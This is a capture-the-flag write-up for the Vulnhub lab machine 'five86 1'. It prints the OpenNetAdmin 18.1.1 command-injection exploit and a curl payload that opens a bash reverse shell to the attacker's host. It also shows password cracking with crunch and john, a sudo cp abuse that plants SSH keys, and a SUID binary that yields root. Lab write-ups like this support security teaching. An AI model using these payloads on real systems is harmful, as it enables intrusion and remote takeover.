Vulnhub - five86 1

Box Stats

Box Info Details
Box Name : five86 1
Series : five86
Difficulty : Easy/Medium
Release Date : 8 Jan 2020
OS : GNU/Linux
Maker : DCAU
Download : five86 1
Recommended : Yes :heavy_check_mark:

Summary

Recently i was busy, i didn’t have the time to make writeups. Luckily now im able to make writeups again, let’s begin with some (g)old series! I also did an update on my writeup style, hope you like it. We start by exploiting OpenNetAdmin this gives us a shell as www-data. Then we continue with multiple privescs. Let’s pwn it! :sunglasses:

PoC

Target IP

Always first step is to find target IP address, i prefer to use the arp-scan utility. Then we’ll save the IP address in a variable.

1
2
3
$ arp-scan --localnet | grep "VMware"
192.168.1.14	00:0c:29:11:aa:bc	VMware, Inc.
$ ip=192.168.1.14

Enumeration/Reconnaissance

Now as always let’s continue with a nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 19:20 EET
Nmap scan report for five86-1.zte.com.cn (192.168.1.14)
Host is up (0.00067s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:11:AA:BC (VMware)

$ nmap -p 22,80,10000 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 19:21 EET
Nmap scan report for five86-1.zte.com.cn (192.168.1.14)
Host is up (0.00046s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 69:e6:3c:bf:72:f7:a0:00:f9:d9:f4:1d:68:e2:3c:bd (RSA)
|   256 45:9e:c7:1e:9f:5b:d3:ce:fc:17:56:f2:f6:42:ab:dc (ECDSA)
|_  256 ae:0a:9e:92:64:5f:86:20:c4:11:44:e0:58:32:e5:05 (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/ona
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
10000/tcp open  http    MiniServ 1.920 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

Let’s focus on port 80, once we visit the website we can see nothing a blank page. We’ll continue with a gobuster scan.

1
2
3
4
$ gobuster dir -q -u http://$ip/ -w $medium -x php,txt,html,js -o scans/gobuster80.txt
/index.html (Status: 200)
/reports (Status: 401)
/robots.txt (Status: 200)

/reports asks for credentials:

/robots.txt has an interesting directory:

1
2
3
$ curl http://$ip/robots.txt
User-agent: *
Disallow: /ona

Shell as www-data

Once we visit /ona we can see OpenNetAdmin installation. OpenNetAdmin is a system for tracking IP network attributes in a database. Our next step is to search for possible exploits, let’s fire up searchsploit.

1
2
3
4
5
6
7
8
$ searchsploit opennetadmin
-----------------------------------------------------------------------------------------------------------
 Exploit Title                                                                    |  Path
-----------------------------------------------------------------------------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                     | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                      | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                       | php/webapps/47691.sh
-----------------------------------------------------------------------------------------------------------

The .sh one looks perfect! Let’s mirror it.

1
2
3
4
5
6
7
$ searchsploit -m php/webapps/47691.sh                                                                                                                                          
  Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47691
     Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
File Type: ASCII text, with CRLF line terminators

Copied to: /root/Documents/vulnhub/five86_1/47691.sh
1
2
3
4
5
6
7
#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

A really simple exploit, if we try to run it we’ll get lot of errors.

1
2
3
4
5
6
$ bash 47691.sh http://$ip/ona/
47691.sh: line 8: $'\r': command not found
47691.sh: line 16: $'\r': command not found
47691.sh: line 18: $'\r': command not found
47691.sh: line 23: syntax error near unexpected token `done'
47691.sh: line 23: `done'

Here we need a little trick. dos2unix modifies newline characters so they can be Linux compatible.

1
2
3
4
5
6
7
$ dos2unix 47691.sh                                                                                                                                                                
dos2unix: converting file 47691.sh to Unix format...
$ bash 47691.sh http://$ip/ona/     
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We got RCE cool, useless shell. Let’s run the curl command manually and edit it a bit. We will inject our reverse shell in it.

The reverse shell we’ll use:

1
bash -c 'bash -i >& /dev/tcp/$your_ip/5555 0>&1

Our finally command will be this:

1
$ curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.16%2F5555%200%3E%261%27&xajaxargs[]=ping" http://$ip/ona/
1
2
3
4
5
6
7
8
$ nc -lvp 5555 
listening on [any] 5555 ...

www-data@five86-1:/opt/ona/www$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@five86-1:/opt/ona/www$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@five86-1:/opt/ona/www$ 

Shell as douglas

Under /opt/ona/www i noticed the .htaccess.example file, this reminds me the .htpasswd file. Let’s search for it.

1
2
3
4
5
www-data@five86-1:/opt/ona/www$ ls -la
total 72
drwxr-xr-x 10 root root 4096 Dec 31  2019 .
drwxr-xr-x  9 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root 1970 Dec 31  2019 .htaccess.example
1
2
www-data@five86-1:/opt/ona/www$ find / -type f -name .htpasswd 2>/dev/null
/var/www/.htpasswd
1
2
3
4
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt 

We need to create a custom wordlist, of course will use crunch. I crafted the following command:

1
2
3
4
5
6
7
$ crunch 10 10 aefhrt -o wordlist.txt                                                                                                                                            
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176 

First 10 is the minimum password length and next 10 is the maximum password length. aefhrt are the characters we use to generate the wordlist.

Around 635MB:

1
2
$ du -sh wordlist.txt 
635M	wordlist.txt

Let’s fire up john on it now.

1
2
3
4
5
6
$ john --wordlist=wordlist.txt password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fatherrrrr       (douglas)

We can use SSH now to connect as douglas:fatherrrrr.

1
2
3
4
5
6
$ ssh douglas@$ip
douglas@192.168.1.14's password: 

douglas@five86-1:~$ whoami;id
douglas
uid=1005(douglas) gid=1005(douglas) groups=1005(douglas)

Shell as jen

Checking sudo -l we can see that we can run cp as jen. A bit tricky for beginners, needs some knowledge on SSH protocol.

1
2
3
4
5
6
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp

We need to setup public key authentication to be able to login as jen. We will copy the the authorized_keys under /home/jen/.ssh/.

First let’s generate our SSH private/public key.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
douglas@five86-1:~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/douglas/.ssh/id_rsa): 
/home/douglas/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/douglas/.ssh/id_rsa.
Your public key has been saved in /home/douglas/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:fiZEg/EJnI6ARmttEJ+JDX/EJUcmBNZ0DyyyXrc4XMQ douglas@five86-1
The key's randomart image is:
+---[RSA 2048]----+
|.*.o*BBO         |
|..%.++OEo.       |
|.+ Xo++ =.       |
|. ..o..+ .       |
|  . o + S        |
|   . + +         |
|      . o o      |
|         +       |
|                 |
+----[SHA256]-----+

Let’s create now the authorized_keys file & give it prems.

1
2
3
4
douglas@five86-1:~$ cd .ssh
douglas@five86-1:~/.ssh$ cat id_rsa.pub >> authorized_keys
douglas@five86-1:~/.ssh$ chmod 777 authorized_keys 
douglas@five86-1:~/.ssh$ mv authorized_keys /tmp

Now let’s copy it & get shell as jen.

1
2
3
4
5
6
7
douglas@five86-1:~/.ssh$ sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
douglas@five86-1:~/.ssh$ ssh -i id_rsa jen@localhost

You have new mail.
jen@five86-1:~$ whoami;id
jen
uid=1003(jen) gid=1003(jen) groups=1003(jen)

Shell as moss

If we check carefully we can notice this message You have new mail., let’s read jens mails.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
jen@five86-1:~$ mail
Mail version 8.1.2 01/15/2001.  Type ? for help.
"/var/mail/jen": 1 message 1 new
>N  1 roy@five86-1       Wed Jan 01 03:17   28/885   Monday Moss
& 1
Message 1:
From roy@five86-1 Wed Jan 01 03:17:00 2020
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500

Hi Jen,

As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.

But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!

Moss will understand (ha ha ha ha).

Tanks,
Roy

So we can easily login as moss now with the password Fire!Fire!.

1
2
3
4
5
jen@five86-1:~$ su - moss
Password: 
moss@five86-1:~$ whoami;id
moss
uid=1001(moss) gid=1001(moss) groups=1001(moss)

Shell as root

Under moss directory a hidden directory .games exists. This has a binary in, if we run it with random answers provide us a root shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
moss@five86-1:~$ ls -la
total 12
drwx------ 3 moss moss 4096 Jan  1  2020 .
drwxr-xr-x 7 root root 4096 Jan  1  2020 ..
lrwxrwxrwx 1 moss moss    9 Jan  1  2020 .bash_history -> /dev/null
drwx------ 2 moss moss 4096 Jan  1  2020 .games
moss@five86-1:~$ cd .games
moss@five86-1:~/.games$ ls -al
total 28
drwx------ 2 moss moss  4096 Jan  1  2020 .
drwx------ 3 moss moss  4096 Jan  1  2020 ..
lrwxrwxrwx 1 moss moss    21 Jan  1  2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss    14 Jan  1  2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss    21 Jan  1  2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss    17 Jan  1  2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss    20 Jan  1  2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss    15 Jan  1  2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss    20 Jan  1  2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss    17 Jan  1  2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss    25 Jan  1  2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss    17 Jan  1  2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss    16 Jan  1  2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss    17 Jan  1  2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 16824 Jan  1  2020 upyourgame
lrwxrwxrwx 1 moss moss    16 Jan  1  2020 worms -> /usr/games/worms
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? t

Could you please repeat that? t

Nope, you'll need to enter that again. t

You entered: No.  Is this correct? t

We appear to have a problem?  Do we have a problem? t

Made in Britain.
# whoami;id
root
uid=0(root) gid=1001(moss) groups=1001(moss)

Reading the flag(s)

1
2
# cat  flag.txt
8f3b38dd95eccf600593da4522251746

Thank You

Thank you for taking the time to read my writeup. If you don’t understand something from the writeup or want to ask me something feel free to contact me through discord(0xatom#8707) or send me a message through twitter 0xatom :blush:

Until next time keep pwning hard! :fire: